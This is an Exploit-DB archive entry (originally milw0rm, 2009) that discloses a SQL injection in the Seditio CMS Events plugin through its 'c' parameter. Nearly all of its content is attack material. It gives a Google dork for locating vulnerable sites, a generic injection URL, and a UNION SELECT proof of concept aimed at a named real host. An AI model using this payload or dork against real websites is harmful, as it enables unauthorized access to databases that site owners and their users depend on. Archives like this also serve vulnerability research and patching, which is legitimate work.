Seditio CMS Events Plugin - 'c' SQL Injection

EDB-ID:

8482


Author:

OoN_Boy

Type:

webapps


Platform:

PHP

Date:

2009-04-20


[+]=================================================================[+]
		[x]Title    : Seditio Events Remote SQL Injection
				      Seditio Events Plugin Remote SQL Injection
		[x]Software : Seditio CMS
		[x]Vendor   : www.neocrome.ne
		[x]Date     : 17 April 2009 ( Indonesia ) 
		[x]Author   : OoN_Boy
		[x]Contact  : oon.boy9@gmail.com
		[x]Blog     : http://oonboy.blogspot.com
[+]=================================================================[+]
		[x] Google Dork

		"Powered by Seditio"
[+]=================================================================[+]
		[x] Exploit

		http://[site]/[path]/plug.php?e=events&f=old&c=all' [SQL]/*
[+]=================================================================[x]
		[x]Poc
		
		http://thespider.neocrome.org/plug.php?e=events&f=old&c=all' union select 1,2,3,4,5,version(),7,8,9,0,1,2,3/*
[+]=================================================================[+]
		[x] Special Greetz
		
		www.BatamHacker.or.id www.MainHack.com - www.ServerIsDown.org - 
		Vrs-hCk, c0li, h4ntu, Opay, Ipay, Paman, NoGe, H312Y, pizzyroot,
		xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, 
		Dan buat semuanya yg ga bisa di sebut satu²
[+]=================================================================[+]

# milw0rm.com [2009-04-20]